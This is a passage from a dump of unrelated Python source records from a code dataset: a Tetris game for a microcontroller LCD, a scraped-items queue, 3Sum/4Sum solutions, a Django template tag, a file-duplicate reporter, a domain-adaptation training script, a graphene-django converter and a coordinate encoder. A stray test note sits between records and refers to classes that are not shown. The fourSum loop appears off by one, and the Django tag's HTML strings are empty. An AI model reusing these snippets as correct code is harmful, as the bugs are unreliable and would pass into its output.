self.fb0 = self.lcd.getframe() # Get the basic framebuf\n\n def setup(self, color_table):\n self.desk = self.lcd.framebuf(0, 0, 240, 240, bits=2, lut=color_table)\n self.desk.clear(0)\n self.desk.color(0,1)\n self.desk.show()\n # for x in range(20,240,20):\n # self.desk.line(x, 0, x, SCREEN_HEIGHT)\n # for y in range(20,240,20):\n # self.desk.line(0, y, SCREEN_WIDTH, y)\n # self.desk.string(24, 100, \"Hello World!\", color=3, font=32, mode=1)\n\n # self.ball = self.lcd.framebuf(0, 100, 32, 32, bits=1, lut=(BLACK, RED))\n # self.ball.clear()\n # self.ball.circle(15,15,14,color=1,style=1)\n\n # def update(self):\n # pos = self.track.next()\n # if pos:\n # self.ball.move(pos[0], pos[1])\n # 
self.ball.showwith(self.desk, mode=1)\n\n\nif __name__ == '__main__':\n\n try:\n timer.deinit() # used to stop timer in 2nd launch\n except:\n pass\n \n lcd = Panel(8, 'PIO1_3', 'PIO0_20')\n lcd.setup( (0x8410, BLACK, GREEN, BLUE) )\n \n gif = open('Count_Down.gif', 'rb')\n lcd.fb0.loadgif(gif, loop=1)\n lpc55.delay(1000)\n\n keys = Keys()\n tetris = Tetris(keys, lcd)\n\n def timerCB(sft):\n tetris.timerCB(sft.time_ms//100)\n\n timer = machine.Timer(-1)\n timer.init(freq=10, callback=timerCB)\n\n","sub_path":"俄罗斯方块/LPCUP_DISK/Tetris_SU.py","file_name":"Tetris_SU.py","file_ext":"py","file_size_in_byte":16319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
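A property worth checking in the Tetris record above: rotateRight maps (x, y) to (-y, x), so four applications must be the identity (this snippet uses the Shape and Tetrominoe classes defined in that record):

s = Shape()
s.setShape(Tetrominoe.LShape)
r = s.rotateRight().rotateRight().rotateRight().rotateRight()
assert [(r.x(i), r.y(i)) for i in range(4)] == [(s.x(i), s.y(i)) for i in range(4)]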
+{"seq_id":"328896372","text":"import sys\n\nfrom tasking_common.config import (\n QUEUE_SERVER,\n QUEUE_DB,\n QUEUE_PORT,\n QUEUE_AUTH_TOKEN,\n QUEUE_SSL, PLATFORM)\n\nfrom nk_queue import SortedQueueClient\nfrom nk_logger import get_logger\n\nfrom tasking_common.utils.string_utils import get_scraped_items_platform_task_queue_name\n\nlogger = get_logger(__name__)\n\n\nclass ScrapedItemsQueue:\n def __init__(self):\n self._sorted_queue_client = SortedQueueClient(\n QUEUE_SERVER,\n QUEUE_PORT,\n QUEUE_DB,\n QUEUE_AUTH_TOKEN,\n QUEUE_SSL,\n )\n self._queue_name = get_scraped_items_platform_task_queue_name(PLATFORM)\n\n def initialize(self):\n self._sorted_queue_client.connect()\n logger.info(f\"{__name__} initialized.\")\n\n def put_scraped_item(self, timestamp, item):\n \"\"\"\n :param timestamp: Represents published_at or created_at date for scraped item\n :param item: Item scraped, generally a json.dumps representation.\n :return: Integer indicating if item was inserted or not (1 or 0).\n \"\"\"\n return self._sorted_queue_client.put(self._queue_name, timestamp, item)\n\n def get_scraped_items(self, min=0, max=sys.maxsize, with_scores=True, start=None, num=None):\n return self._sorted_queue_client.get(\n self._queue_name, min=min, max=max, with_scores=with_scores, start=start, num=num\n )\n\n def remove_scraped_item(self, item):\n return self._sorted_queue_client.delete(self._queue_name, item)\n","sub_path":"tasking_common/queues/scraped_items_queue.py","file_name":"scraped_items_queue.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"283896486","text":"class Solution:\n \"\"\"\n @param numbers: Give an array numbers of n integer\n @return: Find all unique triplets in the array which gives the sum of zero.\n \"\"\"\n\n# remove duplidate at the end of a loop, after left += 1 or right -= 1, do not do other stuff, otherwise, index out of range\n def threeSum(self, numbers):\n self.result = []\n numbers.sort()\n right = len(numbers) - 1\n for i in range(len(numbers) - 2):\n if i > 0 and numbers[i] == numbers[i - 1]:\n continue\n self.two_sum(numbers, i + 1, right)\n return self.result\n\n def two_sum(self, numbers, left, right):\n i = left - 1\n target = - numbers[i]\n while left < right:\n the_sum = numbers[left] + numbers[right]\n if the_sum == target:\n self.result.append([numbers[i], numbers[left], numbers[right]])\n left += 1\n right -= 1\n while left < right and numbers[left] == numbers[left - 1]:\n left += 1\n while left < right and numbers[right] == numbers[right + 1]:\n right -= 1\n elif the_sum > target:\n right -= 1\n else:\n left += 1\n\n\nclass Solution1:\n \"\"\"\n @param numbers: Give an array\n @param target: An integer\n @return: Find all unique quadruplets in the array which gives the sum of zero\n \"\"\"\n\n def fourSum(self, numbers, target):\n # write your code here\n numbers.sort()\n length = len(numbers)\n res = []\n for i in range(length- 4):\n if i and numbers[i] == numbers[i - 1]:\n continue\n for j in range(i + 1, length - 3):\n if j > i+1 and numbers[j] == numbers[j - 1]:\n continue\n left, right = j + 1, length - 1\n while left < right:\n the_sum = numbers[i] + numbers[j] + numbers[left] + numbers[right]\n if the_sum == target:\n res.append([numbers[i], numbers[j], numbers[left], numbers[right]])\n left += 1\n right -= 1\n while left < right and numbers[left] == numbers[left - 1]:\n left += 1\n while left < right and numbers[right] == numbers[right + 1]:\n right -= 1\n elif the_sum > target:\n right -= 1\n else:\n left += 1\n return res\n","sub_path":"pythonlearn/leetCode/twopointers/n57three_sum_n58_4sum.py","file_name":"n57three_sum_n58_4sum.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"350830796","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.utils.html import conditional_escape as esc\nfrom django.utils.safestring import mark_safe\n\nfrom apps.gcd.models import Issue\n\nregister = template.Library()\n\n\ndef last_updated_issues(parser, token):\n \"\"\"\n Display the last updated indexes as a tag\n \"\"\"\n try:\n number = int(token.split_contents()[1])\n except:\n number = 5\n issues = Issue.objects.filter(story_type_count__gt=0, reserved=False)\\\n\t\t\t\t .order_by('-modified')\n last_updated_issues = issues[:number]\n return LastUpdatedNode(last_updated_issues)\n\n\nclass LastUpdatedNode(template.Node):\n def __init__(self, issues):\n self.issues = issues\n def render(self, context):\n return_string = \"\"\n for i in self.issues:\n return_string += \"\" + \\\n esc(i.series) + \" #\" + esc(i.number) + \" (\" + \\\n esc(i.series.publisher.name) + \")
\"\n return mark_safe(return_string)\n\n\nregister.tag('last_updated_issues', last_updated_issues)\n","sub_path":"branches/vieuxbois/pydjango/apps/gcd/templatetags/statustags.py","file_name":"statustags.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"370843209","text":"# 区分求積法\r\nimport numpy as np\r\n\r\nfs = 10\r\nt = np.arange(fs / 2) / fs\r\nf = 1\r\nT = 0.5\r\nx = np.sin(2 * np.pi * f * t)\r\nS = np.sum(x) * T / fs\r\nprint(S)\r\n","sub_path":"hnammoku/chapter02/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"235943505","text":"def file_hash(filepath, calc_hashes = False):\n ''' return the hash of a file'''\n pass\n\nimport os, sys, hashlib\n\ndef recursive_dir(root,path, depth, whole):\n filelist = os.listdir(path)\n # uncomment to show dirs\n # print(' '*(depth*4)+\"[\"+path+\"]\", len(filelist),'files')\n for item in filelist:\n # print(path,item)\n fullpath = path+'\\\\'+item\n if os.path.isdir(fullpath):\n recursive_dir(root,fullpath,depth+1,whole)\n else:\n # print (' '*(depth*4)+path+item)\n si = os.stat(fullpath).st_size\n # files[item]=\n # if si not in sizes:sizes[si] = []\n # sizes[si].append(fullpath.replace(root+'\\\\',''))\n whole.append({\n \"filename\":item,\n \"fullpath\":fullpath,\n \"relative_dir\":fullpath.replace(root,\"\").replace(item,''),\n \"size\":si\n })\n\n\ndef recursive_scan(directory):\n '''duh\n return [{path, dir, filename, size, readable_size, hash}]\n '''\n result = []\n recursive_dir(directory, directory, 0, result)\n return result\n\ndef flushpoint():\n sys.stdout.write('.')\n sys.stdout.flush()\ndef print_overwrite(*s):\n print(s, end='\\r')\ndef generate_index_by_name(report):\n result={}\n for a in report:\n name = a[\"filename\"]\n if name not in result: # multimap trick\n result[name] = []\n result[name].append(a)\n # collision = {k:v if len(v)>1 for (k,v) in result.items()}\n collisions = {k:v for (k,v) in result.items() if len(v)>1}\n filtered = [f for f in filter(lambda a: a[\"filename\"] in collisions, report)]\n return result, collisions, filtered\n # return result, collisions\n\ndef generate_index_by_hash(report):\n hash_map = {}\n i = 0\n for a in report:\n hasher = hashlib.md5()\n with open(a[\"fullpath\"], 'rb') as afile:\n buf = afile.read()\n hasher.update(buf)\n hashed = hasher.hexdigest()\n if hashed not in hash_map:\n hash_map[hashed]=[]\n hash_map[hashed].append(a)\n # flushpoint()\n print_overwrite(i, 'of', len(report)\n # , a['filename']\n )\n i+=1\n print()\n collisions = {k:v for (k,v) in hash_map.items() if len(v)>1}\n return hash_map, collisions\n\ndef generate_index_by_size(report):\n result={}\n for a in report:\n size = a[\"size\"]\n if size not in result: # multimap trick\n result[size] = []\n result[size].append(a)\n # collision = {k:v if len(v)>1 for (k,v) in result.items()}\n collisions = {k:v for (k,v) in result.items() if len(v)>1}\n filtered = [f for f in filter(lambda a: a[\"size\"] in collisions, report)]\n return result, collisions, filtered\n\ndef html_report(collisions, file):\n import htmlshow as hts\n tabled = []\n \n for k,col in collisions.items():\n tabled.append([\n str(len(col)), ', '.join([a[1] for a in col]),\n # ', '.join([a['filename'] for a in col]),\n ', '.join([a[0] for a in col])\n # ', '.join([a['relative_path'] for a in col])\n ])\n\n hts.html_start(file)\n file.write(hts.tablirize(tabled))\n hts.html_finish(file)\n \n","sub_path":"_projlab/dupl-analysis/duplicate_report.py","file_name":"duplicate_report.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"342368011","text":"from __future__ import print_function\nimport argparse\nfrom utils.utils import *\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nfrom data_loader.get_loader import get_loader\nimport numpy as np\nimport os\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch Openset DA')\nparser.add_argument('--batch-size', type=int, default=32, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=1000, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--log-interval', type=int, default=100, metavar='N',\n help='how many batches to wait before logging training status')\nparser.add_argument('--lr', type=float, default=0.001, metavar='LR',\n help='learning rate (default: 0.001)')\nparser.add_argument('--net', type=str, default='resnet152', metavar='B',\n help='which network alex,vgg,res?')\nparser.add_argument('--save', action='store_true', default=False,\n help='save model or not')\nparser.add_argument('--save_path', type=str, default='checkpoint/checkpoint_so', metavar='B',\n help='checkpoint path')\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\nparser.add_argument('--unit_size', type=int, default=1000, metavar='N',\n help='unit size of fully connected layer')\nparser.add_argument('--update_lower', action='store_true', default=False,\n help='update lower layer or not')\nparser.add_argument('--no_cuda', action='store_true', default=False,\n help='disable cuda')\nparser.add_argument('--source_path', type=str, default='./utils/source_list.txt', metavar='B',\n help='checkpoint path')\nparser.add_argument('--target_path', type=str, default='./utils/target_list.txt', metavar='B',\n help='checkpoint path')\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nsource_data = args.source_path\ntarget_data = args.target_path\nevaluation_data = args.target_path\n\nbatch_size = args.batch_size\ndata_transforms = {\n source_data: transforms.Compose([\n transforms.Scale(256),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n target_data: transforms.Compose([\n transforms.Scale(256),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n evaluation_data: transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n}\nuse_gpu = torch.cuda.is_available()\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\ntrain_loader, test_loader = get_loader(source_data, target_data, evaluation_data,\n data_transforms, batch_size=args.batch_size)\ndataset_train = train_loader.load_data()\ndataset_test = test_loader\n\nnum_class = 7\nclass_list = [\"bicycle\", \"bus\", \"car\", \"motorcycle\", \"train\", \"truck\", \"unk\"]\n\nG, C = get_model(args.net, num_class=num_class, unit_size=args.unit_size)\nif args.cuda:\n G.cuda()\n C.cuda()\nopt_c, opt_g = get_optimizer_visda(args.lr, G, C,\n update_lower=args.update_lower)\n\nprint(args.save_path)\ndef train(num_epoch):\n criterion = nn.CrossEntropyLoss().cuda()\n i = 0\n print('train start!')\n for ep in 
range(num_epoch):\n        G.train()\n        C.train()\n        for batch_idx, data in enumerate(dataset_train):\n            i += 1\n            if i % 1000 == 0:\n                print('iteration %d' % i)\n            if args.cuda:\n                img_s = data['S']\n                label_s = data['S_label']\n                img_t = data['T']\n                img_s, label_s = Variable(img_s.cuda()), \\\n                    Variable(label_s.cuda())\n                img_t = Variable(img_t.cuda())\n                if len(img_t) < batch_size:\n                    break\n                if len(img_s) < batch_size:\n                    break\n            opt_g.zero_grad()\n            opt_c.zero_grad()\n            feat = G(img_s)\n            out_s = C(feat)\n            loss_s = criterion(out_s, label_s)\n            loss_s.backward()\n            opt_g.step()\n            opt_c.step()\n            opt_g.zero_grad()\n            opt_c.zero_grad()\n\n            if batch_idx % args.log_interval == 0:\n                print('Train Ep: {} [{}/{} ({:.0f}%)]\\tLoss Source: {:.6f}\\t'.format(\n                    ep, batch_idx * len(data), 70000,\n                    100. * batch_idx / 70000, loss_s.data[0]))\n            if ep > 0 and batch_idx % 1000 == 0:\n                test()\n                G.train()\n                C.train()\n        # adjust_learning_rate(opt_g, args.lr)\n        # adjust_learning_rate(opt_c, args.lr)\n\n        if args.save:\n            if not os.path.exists(args.save_path):\n                os.mkdir(args.save_path)\n            save_model(G, C, args.save_path+'_'+str(ep))\n\n\ndef test():\n    G.eval()\n    C.eval()\n    correct = 0\n    size = 0\n    per_class_num = np.zeros((num_class))\n    per_class_correct = np.zeros((num_class)).astype(np.float32)\n    for batch_idx, data in enumerate(dataset_test):\n        #with torch.no_grad():\n        if args.cuda:\n            img_t, label_t, path_t = data[0], data[1], data[2]\n            img_t, label_t = Variable(img_t.cuda(), volatile=True), \\\n                Variable(label_t.cuda(), volatile=True)\n        feat = G(img_t)\n        out_t = C(feat)\n\n        pred = out_t.data.max(1)[1]  # get the index of the max log-probability\n        # pred_tmp = pred.cpu().numpy()\n        # pred_ind = np.where(pred_tmp==13)[0]\n        # pred_tmp[pred_ind] = 12\n        # pred = torch.from_numpy(pred_tmp)\n\n        k = label_t.data.size()[0]\n        correct += pred.eq(label_t.data).cpu().sum()\n        pred = pred.cpu().numpy()\n        for t in range(num_class):\n            t_ind = np.where(label_t.data.cpu().numpy() == t)\n            correct_ind = np.where(pred[t_ind[0]] == t)\n            per_class_correct[t] += float(len(correct_ind[0]))\n            per_class_num[t] += float(len(t_ind[0]))\n        size += k\n    per_class_acc = per_class_correct / per_class_num\n\n    print(\n        '\\nTest set including unknown classes: Accuracy: {}/{} ({:.0f}%) ({:.4f}%)\\n'.format(\n            correct, size,\n            100. * correct / size, float(per_class_acc.mean())))\n    for ind, category in enumerate(class_list):\n        print('%s:%s' % (category, per_class_acc[ind]))\n\n\ntrain(args.epochs + 1)\n","sub_path":"trainer_osda_sourceonly.py","file_name":"trainer_osda_sourceonly.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"220410152","text":"import re\r\nfrom collections import OrderedDict\r\n\r\nfrom django.contrib.postgres.fields import ArrayField, HStoreField, RangeField\r\nfrom django.db import models\r\nfrom django.utils.encoding import force_text\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom graphene import (Field, ID, Boolean, Dynamic, Enum, Float, Int, List, NonNull, String, UUID)\r\nfrom graphene.types.datetime import DateTime, Time\r\nfrom graphene.types.json import JSONString\r\nfrom graphene.utils.str_converters import to_camel_case, to_const\r\nfrom graphene_django.fields import DjangoListField\r\nfrom graphene_django.utils import import_single_dispatch, get_model_fields\r\nfrom rest_framework.fields import JSONField\r\nfrom rest_framework.compat import get_related_model\r\n\r\nfrom .fields import DjangoFilterListField\r\nfrom .utils import is_required\r\n\r\nsingledispatch = import_single_dispatch()\r\n\r\n\r\nNAME_PATTERN = r'^[_a-zA-Z][_a-zA-Z0-9]*$'\r\nCOMPILED_NAME_PATTERN = re.compile(NAME_PATTERN)\r\n\r\n\r\ndef assert_valid_name(name):\r\n \"\"\"Helper to assert that provided names are valid.\"\"\"\r\n assert COMPILED_NAME_PATTERN.match(name), 'Names must match /{}/ but \"{}\" does not.'.format(NAME_PATTERN, name)\r\n\r\n\r\ndef convert_choice_name(name):\r\n name = to_const(force_text(name))\r\n try:\r\n assert_valid_name(name)\r\n except AssertionError:\r\n name = \"A_%s\" % name\r\n return name\r\n\r\n\r\ndef get_choices(choices):\r\n converted_names = []\r\n for value, help_text in choices:\r\n if isinstance(help_text, (tuple, list)):\r\n for choice in get_choices(help_text):\r\n yield choice\r\n else:\r\n name = convert_choice_name(value)\r\n while name in converted_names:\r\n name += '_' + str(len(converted_names))\r\n converted_names.append(name)\r\n description = help_text\r\n yield name, value, description\r\n\r\n\r\ndef convert_django_field_with_choices(field, registry=None, input_flag=None):\r\n choices = getattr(field, 'choices', None)\r\n if choices:\r\n meta = field.model._meta\r\n\r\n name = to_camel_case('{}_{}_{}'.format(meta.object_name, field.name, 'Input')) \\\r\n if input_flag \\\r\n else to_camel_case('{}_{}'.format(meta.object_name, field.name))\r\n\r\n enum_type = registry.get_type_for_enum(name)\r\n if enum_type:\r\n return enum_type\r\n else:\r\n choices = list(get_choices(choices))\r\n named_choices = [(c[0], c[1]) for c in choices]\r\n named_choices_descriptions = {c[0]: c[2] for c in choices}\r\n\r\n class EnumWithDescriptionsType(object):\r\n @property\r\n def description(self):\r\n return named_choices_descriptions[self.name]\r\n\r\n enum = Enum(name, list(named_choices), type=EnumWithDescriptionsType)\r\n\r\n registry.register_enum(enum, key=name)\r\n\r\n return enum(description=field.help_text, required=is_required(field, input_flag))\r\n return convert_django_field(field, registry, input_flag)\r\n\r\n\r\ndef construct_fields(model, registry, only_fields, exclude_fields, input_flag=None):\r\n _model_fields = get_model_fields(model)\r\n\r\n fields = OrderedDict()\r\n\r\n if input_flag == 'delete':\r\n converted = convert_django_field_with_choices(dict(_model_fields)['id'], registry)\r\n fields['id'] = converted\r\n else:\r\n for name, field in _model_fields:\r\n if input_flag == 'create' and name == 'id':\r\n continue\r\n\r\n is_not_in_only = only_fields and name not in only_fields\r\n # is_already_created = name in options.fields\r\n is_excluded = name in exclude_fields # or is_already_created\r\n # 
https://docs.djangoproject.com/en/1.10/ref/models/fields/#django.db.models.ForeignKey.related_query_name\r\n is_no_backref = str(name).endswith('+')\r\n if is_not_in_only or is_excluded or is_no_backref:\r\n # We skip this field if we specify only_fields and is not\r\n # in there. Or when we exclude this field in exclude_fields.\r\n # Or when there is no back reference.\r\n continue\r\n converted = convert_django_field_with_choices(field, registry, input_flag)\r\n\r\n fields[name] = converted\r\n\r\n return fields\r\n\r\n\r\n@singledispatch\r\ndef convert_django_field(field, registry=None, input_flag=None):\r\n raise Exception(\r\n \"Don't know how to convert the Django field %s (%s)\" %\r\n (field, field.__class__))\r\n\r\n\r\n@convert_django_field.register(models.CharField)\r\n@convert_django_field.register(models.TextField)\r\n@convert_django_field.register(models.EmailField)\r\n@convert_django_field.register(models.SlugField)\r\n@convert_django_field.register(models.URLField)\r\n@convert_django_field.register(models.GenericIPAddressField)\r\n@convert_django_field.register(models.FileField)\r\ndef convert_field_to_string(field, registry=None, input_flag=None):\r\n return String(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.AutoField)\r\ndef convert_field_to_id(field, registry=None, input_flag=None):\r\n if input_flag:\r\n return ID(description=field.help_text or _('Django object unique identification field'),\r\n required=input_flag == 'update')\r\n return ID(description=field.help_text or _('Django object unique identification field'), required=not field.null)\r\n\r\n\r\n@convert_django_field.register(models.UUIDField)\r\ndef convert_field_to_uuid(field, registry=None, input_flag=None):\r\n return UUID(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.PositiveIntegerField)\r\n@convert_django_field.register(models.PositiveSmallIntegerField)\r\n@convert_django_field.register(models.SmallIntegerField)\r\n@convert_django_field.register(models.BigIntegerField)\r\n@convert_django_field.register(models.IntegerField)\r\ndef convert_field_to_int(field, registry=None, input_flag=None):\r\n return Int(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.BooleanField)\r\ndef convert_field_to_boolean(field, registry=None, input_flag=None):\r\n required = is_required(field, input_flag)\r\n if required:\r\n return NonNull(Boolean, description=field.help_text)\r\n return Boolean(description=field.help_text)\r\n\r\n\r\n@convert_django_field.register(models.NullBooleanField)\r\ndef convert_field_to_nullboolean(field, registry=None, input_flag=None):\r\n return Boolean(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.DecimalField)\r\n@convert_django_field.register(models.FloatField)\r\n@convert_django_field.register(models.DurationField)\r\ndef convert_field_to_float(field, registry=None, input_flag=None):\r\n return Float(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.DateField)\r\n@convert_django_field.register(models.DateTimeField)\r\ndef convert_date_to_string(field, registry=None, input_flag=None):\r\n return DateTime(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.TimeField)\r\ndef 
convert_time_to_string(field, registry=None, input_flag=False):\r\n return Time(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(models.OneToOneRel)\r\ndef convert_onetoone_field_to_djangomodel(field, registry=None, input_flag=None):\r\n model = field.related_model\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return ID()\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n # We do this for a bug in Django 1.8, where null attr\r\n # is not available in the OneToOneRel instance\r\n # null = getattr(field, 'null', True)\r\n # return Field(_type, required=not null)\r\n\r\n return Field(_type)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(models.ManyToManyField)\r\ndef convert_field_to_list_or_connection(field, registry=None, input_flag=None):\r\n model = get_related_model(field)\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return DjangoListField(ID, required=is_required(field, input_flag))\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n if _type._meta.filter_fields:\r\n return DjangoFilterListField(_type)\r\n # return DjangoFilterPaginateListField(_type, pagination=LimitOffsetGraphqlPagination())\r\n return DjangoListField(_type)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(models.ManyToManyRel)\r\n@convert_django_field.register(models.ManyToOneRel)\r\ndef convert_many_rel_to_djangomodel(field, registry=None, input_flag=None):\r\n model = field.related_model\r\n if isinstance(field, models.ManyToManyRel):\r\n for f in field.related_model._meta.many_to_many:\r\n if f.rel.name == field.name and f.rel.model == field.model:\r\n blank = f.blank\r\n else:\r\n blank = True\r\n\r\n _field = field\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return DjangoListField(ID, required=not blank and input_flag == 'create')\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n if _type._meta.filter_fields:\r\n return DjangoFilterListField(_type)\r\n # return DjangoFilterPaginateListField(_type, pagination=LimitOffsetGraphqlPagination())\r\n return DjangoListField(_type)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(models.OneToOneField)\r\n@convert_django_field.register(models.ForeignKey)\r\ndef convert_field_to_djangomodel(field, registry=None, input_flag=None):\r\n model = get_related_model(field)\r\n\r\n def dynamic_type():\r\n if input_flag:\r\n return ID(description=field.help_text, required=is_required(field, input_flag))\r\n\r\n _type = registry.get_type_for_model(model)\r\n if not _type:\r\n return\r\n\r\n # return Field(_type, description=field.help_text, required=field.null)\r\n return Field(_type, description=field.help_text)\r\n\r\n return Dynamic(dynamic_type)\r\n\r\n\r\n@convert_django_field.register(ArrayField)\r\ndef convert_postgres_array_to_list(field, registry=None, input_flag=None):\r\n base_type = convert_django_field(field.base_field)\r\n if not isinstance(base_type, (List, NonNull)):\r\n base_type = type(base_type)\r\n return List(base_type, description=field.help_text, required=is_required(field, input_flag))\r\n\r\n\r\n@convert_django_field.register(HStoreField)\r\n@convert_django_field.register(JSONField)\r\ndef convert_posgres_field_to_string(field, registry=None, input_flag=None):\r\n return JSONString(description=field.help_text, required=is_required(field, 
input_flag))\r\n\r\n\r\n@convert_django_field.register(RangeField)\r\ndef convert_posgres_range_to_string(field, registry=None, input_flag=None):\r\n inner_type = convert_django_field(field.base_field)\r\n if not isinstance(inner_type, (List, NonNull)):\r\n inner_type = type(inner_type)\r\n return List(inner_type, description=field.help_text, required=is_required(field, input_flag))\r\n","sub_path":"graphene_django_extras/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":11405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
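
A quick note on the record above: `get_choices` is the piece that turns Django's `(value, label)` choice pairs into GraphQL-safe `(NAME, value, description)` triples, prefixing names that would be invalid GraphQL identifiers and suffixing duplicates. A minimal sketch of its behavior; the import path and the sample choices are hypothetical:

```python
from converter import get_choices  # hypothetical import path for the record's module

choices = [('cat', 'A cat'), ('dog', 'A dog'), ('9lives', 'Nine lives')]
print(list(get_choices(choices)))
# [('CAT', 'cat', 'A cat'), ('DOG', 'dog', 'A dog'),
#  ('A_9LIVES', '9lives', 'Nine lives')]   <- 'A_' prefix since '9LIVES' is not a valid name
```
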
+{"seq_id":"462398943","text":"from __future__ import unicode_literals\nfrom bisect import bisect_left, bisect_right\n\nimport re\nimport calendar\nfrom decimal import Decimal\nfrom datetime import datetime\n\nfrom django.utils.timezone import utc\n\n\nY2K_TIMESTAMP = 946684800\nTIMESTAMP_MIN_LENGTH = 10\nLATITUDE_MIN_LENGTH = 3\nLONGITUDE_MIN_LENGTH = 4\n\n\ndef encode_number(num):\n encoded = \"\"\n while num >= 0x20:\n encoded += chr((0x20 | (num & 0x1f)) + 63)\n num >>= 5\n encoded += chr(num + 63)\n return encoded\n\n\ndef encode_signed_number(num):\n sgn_num = num << 1\n if num < 0:\n sgn_num = ~sgn_num\n return encode_number(sgn_num)\n\n\ndef decode_number(encoded):\n enc_len = len(encoded)\n ii = 0\n shift = 0\n result = 0\n b = 0x20\n while b >= 0x20 and ii < enc_len:\n b = ord(encoded[ii]) - 63\n ii += 1\n result |= (b & 0x1f) << shift\n shift += 5\n if result & 1:\n return ~(result >> 1), encoded[ii:]\n else:\n return result >> 1, encoded[ii:]\n\n\nclass GeoCoordinates(object):\n repr_re = re.compile(\n r'^(?P^\\-?\\d{1,2}(\\.\\d+)?),'\n r'(?P\\-?1?\\d{1,2}(\\.\\d+)?$)'\n )\n _latitude = None\n _longitude = None\n\n @staticmethod\n def min_length(precision=None, separator=\",\"):\n min_len = LATITUDE_MIN_LENGTH + len(separator) + LONGITUDE_MIN_LENGTH \n if precision is not None and precision > 0:\n return min_len + 2 * (1 + precision)\n return min_len\n\n def __init__(self, *args):\n if len(args) > 2:\n raise TypeError('Too many arguments')\n elif len(args) == 2:\n self.latitude = args[0]\n self.longitude = args[1]\n elif len(args) == 1:\n value = args[0]\n if isinstance(value, basestring):\n match = self.repr_re.match(value)\n if match is None:\n raise ValueError(\"Incorrect argument '{}'\".format(value))\n self.latitude = match.group('latitude')\n self.longitude = match.group('longitude')\n if isinstance(value, (tuple, list)):\n self.latitude = value[0]\n self.longitude = value[1]\n else:\n raise TypeError()\n\n @property\n def latitude(self):\n return self._latitude\n\n @latitude.setter\n def latitude(self, value):\n if isinstance(value, (float, int)):\n value = str(value)\n # Put value in a correct range\n lat_mod = ((Decimal(value) + 90) % 360 + 360) % 360\n lat = 270 - lat_mod if lat_mod >= 180 else lat_mod - 90\n self._latitude = lat\n\n @property\n def longitude(self):\n return self._longitude\n\n @longitude.setter\n def longitude(self, value):\n if isinstance(value, (float, int)):\n value = str(value)\n # Put value in a correct range\n lon = ((Decimal(value) + 180) % 360 + 360) % 360 - 180\n self._longitude = lon\n\n def format_string(self, precision=None, separator=','):\n fmt = \"{0}\"\n if all([precision is not None,\n any([not isinstance(precision, int),\n precision < 0])]):\n TypeError(\"Invalid argument 'precision'.\")\n elif precision is not None:\n fmt = \"%.{0}f\".format(precision)\n return separator.join([fmt.format(self.latitude),\n fmt.format(self.longitude)])\n\n def __str__(self):\n return self.format_string()\n\n def __repr__(self):\n return \"GeoCoordinates(%s)\" % str(self)\n\n def __len__(self):\n return len(str(self))\n\n def __eq__(self, other):\n return (isinstance(other, GeoCoordinates)\n and self.latitude == other.latitude\n and self.longitude == other.longitude)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __cmp__(self, other):\n if not isinstance(other, GeoCoordinates):\n raise TypeError('Can only compare to other instances of '\n 'GeoCoordinates')\n return cmp((self.latitude, self.longitude),\n 